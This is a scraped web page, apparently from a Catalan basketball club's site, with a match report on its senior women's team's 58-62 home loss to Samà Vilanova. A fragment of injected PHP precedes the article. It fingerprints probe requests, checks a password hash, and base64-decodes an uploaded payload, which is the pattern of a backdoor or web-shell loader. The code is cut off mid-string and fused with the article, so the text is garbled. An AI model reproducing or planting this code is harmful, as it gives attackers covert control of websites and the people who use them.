function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Derrota incòmoda al Sagrat Cor (58-62) -

Derrota incòmoda al Sagrat Cor (58-62)

Updated: octubre 16, 2022

Partit corresponent a la jornada 4 de la competició domèstica on el Sènior A ha rebut el Samà Vilanova al Sagrat Cor. L’equip Lila no ha pogut encadenar el tercer triomf consecutiu de la temporada (58-62) i ha sumat així, la segona derrota en un duel que s’ha decidit en els instants finals.

El primer quart ha començat amb uns percentatges molt baixos en atac d’ambdós equips, arribant així 10-10 al final dels primers deu minuts del matx. En el segon quart, el TGN Bàsquet no s’ha sentit còmode en cap moment, sense trobar el ritme del partit ni la inèrcia defensiva. El conjunt visitant ha estat encertat en atac i s’han posat per davant al marcador (22-32) arribant al descans deu punts per sobre.

A la represa, les Liles han començat la segona part amb coratge i energia positiva escurçant la diferència a 5 punts, però a partir d’aquest moment han tornat les errades, les pèrdues de pilota i el desencert en atac i l’equip visitant ha acabat ampliant l’avantatge a l’electrònic. En el darrer quart les Liles han mostrat l’#ADNTGN, però el duel s’ha decidit en un final a cara i creu cap al bàndol visitant. (58-62)

El tècnic Lila ha fet una valoració després del matx: ”És un moment complicat, ja que crec que era un rival assequible per obtenir un millor resultat.” La setmana vinent l’equip jugarà diumenge 23 contra el Roser A (12.30h) al Poliesportiu Estació del Nord. El Marc Rovirosa descriu el proper rival: ”Un dels equips més potents de la categoria; un equip que desprèn molta intensitat i que juguen amb molt de ritme”. Finalment ha afegit: ”Tenim molt clar que s’ha de competir, competir i seguir competint”.

”L’equip no ha estat encertat, ni actiu ni al 100% del que podem arribar a competir…”

TGN BÀSQUET A: 58 – SAMÀ VILANOVA 62

PARCIALS: 10-10, 12-22, 18-12, 18-18